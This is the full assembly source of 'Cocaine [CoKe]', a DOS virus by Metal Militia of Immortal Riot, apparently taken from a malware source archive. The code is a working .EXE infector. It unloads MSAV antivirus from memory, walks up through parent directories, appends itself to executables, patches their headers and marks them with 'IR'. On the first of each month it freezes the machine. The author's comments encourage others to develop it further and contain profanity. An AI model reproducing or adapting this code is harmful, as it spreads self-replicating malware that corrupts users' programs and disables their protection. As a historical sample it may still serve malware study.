MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.coke.asm

280 lines
9.8 KiB
NASM
Raw Normal View History

2021-01-12 23:34:47 +00:00
; Virus name : Cocaine [CoKe]
; Virus author: Metal Militia
; Virus group : Immortal Riot
; Origin : Sweden
;
; This is an non-resident, .EXE infector moving upwards using the
; "dot-dot" method. Watch your .EXE files for the bad guy siganture
; "IR" somewhere in the beginning, after the MZ or ZM thang.. :)
;
; Also, check your back for a "?" a bit from it aswell. Btw! Everytime
; you run it, it'll take out that fucking MSAV piece of shit from your
; memory. Im telling you, go get TB-SCAN or something instead of such
; hacked things. TB-Scan finds this virus as both Ear-6 and Burma but
; is not any sort of hack from them or something. I didn't had time to
; fix the encryption, and since this is just a test from me i really
; don't give a shit, but ofcause you're always welcome to keep
; developing it, heheh :)
;
; To add here, is that Ear-6 is non-res com/exe infector, umm.. that's
; Dark Angels virus, and this is not alike it! Burma is non-res ow-vir,
; and also not very much alike this anyhow.. However, i've heard about
; some resident, non-ow Burma aswell? Not sure on thatone. So, it'll
; probably only confuse some users, I guess.. Enjoy Insane Reality #4!!
;
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; COCAINE! [CoKE]
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
.model tiny
.radix 16
.code
org 100
start:
mov blast,0fa01 ; Take MSAV's shit
mov dx,5945h ; out of the fucking
int 16 ; memory right away
push ds ;Save old offset
push cs ;Set ES/DS/CS
pop es
push cs
pop ds ;for data accessing.
call get_offset ;This places the displace-
get_offset: ;ment of the virus from
pop bp ;its original compilation
sub bp,offset get_offset ;into BP.
Reset_Variables: ;Reset XX_old values for
lea di,[IP_storage+bp] ;new infection.
lea si,[IP_old+bp]
call mov_it
call mov_it
call mov_it
call mov_it
jmp set_dta
mov_it:
movsw ; movsw
ret ; ret(urn) to caller
Set_DTA:
lea dx,[New_DTA+bp] ;Set DTA to the after
mov ah,readin ;virus
int 21
mov ah,47h ; Get
mov dl,0 ; current
lea si,[bp+new_dta+2ch] ; directory
int 21h
Find_first_file:
mov ah,4e ; Find first
lea dx,[bp+masker] ; .EXE file
Find_File:
int 21
jnc infeqt ; If found, infect
jmp ch_dir ; Else, change directoy
Infeqt:
mov blast,3d02 ; Open file
lea dx,[bp+New_DTA+1e] ; 1eh = DTA place for filename
int 21
xchg bx,blast ; Or, mov ax,bx
mov ah,3f ; Read in
mov mate,readin ; 1ah
lea dx,[bp+exe_header] ; to EXE header
int 21
cmp word ptr [bp+exe_header+0e],'RI' ; Check if already
je close_file ; infected. If so,
; close and get nextone
call Save_Old_Header ; Save old header
mov blast,4202 ; Go to the end of the file.
xor mate,mate
cwd
int 21
push blast
push dx
call calculate_CSIP ; calculate virus startingpoint
pop dx
pop blast
call calculate_size ; calculate fsize for the header
mov mate,end_virus-start ; viruscode
mov ah,svenne ; write it
lea dx,[bp+start] ; from start
int 21 ; to victim (uninfected file)
mov blast,4200 ; Return to the beginning
xor mate,mate ; of the file.
cwd
int 21
mov mate,readin ; 1ah
mov ah,svenne ; write it
lea dx,[bp+exe_header] ; to the EXE header
int 21
Close_File:
mov ah,3e ; close the file
int 21 ; and go get the nextone
Find_Next_File:
mov ah,4f ; find next file
jmp Find_File ; do it!
No_More_Files:
mov ah,2a ; get date
int 21
cmp dl,1 ; 1st of any month?
jne ret_to_host ; if not, outa here
mov ah,9 ; print
lea dx,[bp+eternal_love] ; the note
int 21
jmp $
ret_to_host:
lea dx,[bp+new_dta+2ch] ; Restore
mov ah,3bh ; directory
int 21
pop ds
mov dx,80 ; restore
mov ah,readin ; the DTA
int 21
Restore_To_Host:
push ds ; Restore ES/DS/PSP
pop es
mov blast,es
add blast,10
add word ptr cs:[bp+CS_storage],blast
; By current seg, adjust old CS
cli ; Clear int's
add blast,word ptr cs:[bp+SS_storage] ; Old SS (adjust it)
mov ss,blast ; Original position
mov sp,word ptr cs:[bp+SP_storage] ; (return stack)
sti ; Store (?) int's
db 0ea ; Jmp Far
IP_storage dw 0 ; Storage place for IP/CS/SP/SS
CS_storage dw 0
SP_storage dw 0
SS_storage dw 0
IP_old dw 0
CS_old dw 0fff0
SP_old dw 0
SS_old dw 0fff0
K_kool:
jmp no_more_files
K_spam:
jmp find_first_file
Save_Old_Header:
mov blast,word ptr [exe_header+bp+0e] ; Save SS (old)
mov word ptr [SS_old+bp],blast
mov blast,word ptr [exe_header+bp+10] ; Save SP (old)
mov word ptr [SP_old+bp],blast
mov blast,word ptr [exe_header+bp+14] ; Save IP (old)
mov word ptr [IP_old+bp],blast
mov blast,word ptr [exe_header+bp+16] ; Save CS (old)
mov word ptr [CS_old+bp],blast
ret
calculate_CSIP:
push blast
mov blast,word ptr [exe_header+bp+8] ;Get header length
mov cl,brutal ;and convert it to
shl blast,cl ;bytes.
mov mate,blast
pop blast
sub blast,mate ;Subtract from
sbb dx,RAVE ;file (header size)
mov cl,0c ;Convert into segment
shl dx,cl ;address (DX)
mov cl,brutal
push blast
shr blast,cl
add dx,blast
shl blast,cl
pop mate
sub mate,blast
mov word ptr [exe_header+bp+14],mate
mov word ptr [exe_header+bp+16],dx ;Set CS:IP (new)
mov word ptr [exe_header+bp+0e],'RI' ;Set SS/CS (new)
mov word ptr [exe_header+bp+10],0fffe ;Set SP (new)
mov byte ptr [exe_header+bp+12],'?' ;mark infection
ret
calculate_size:
push blast ;Save offset for later
add blast,end_virus-start ; add size (virus)
adc dx,RAVE
mov cl,POLICE
shl dx,cl ;convert to pages (DX)
mov cl,BRUTALITY
shr blast,cl
add blast,dx
inc blast
mov word ptr [exe_header+bp+SPAM],blast ; save pages (x number)
pop blast ; get offset
mov dx,blast
shr blast,cl ; calcute last page
shl blast,cl ; (remainder)
sub dx,blast
mov word ptr [exe_header+bp+RUDE],dx ;save remainder
ret
ch_dir:
mov ah,3bh ; Change
lea dx,[bp+dot_dot] ; up a dir
int 21
jc no_more ; If root, outa here
jmp k_spam ; Else, try to infect here aswell
no_more:
jmp k_kool
blast equ ax
mate equ cx
police equ 7
brutality equ 9
rave equ 0 ; Hey! That's you :)
spam equ 04
rude equ 02
brutal equ 4
readin equ 1a
svenne equ 40
virnote db 'Cocaine [CoKe]'
db '(c) Metal Militia/Immortal Riot'
eternal_love db 0dh,0ah,'Love to LISA :)',0dh,0ah,'$'
db 'Cocaine''s running thrue your vains'
db 'It seems you have become an addict'
masker db '*IR.EXE',0 ;File mask used for search
dot_dot db '..',0
end_virus:
exe_header db 1a dup (?)
New_DTA:
end start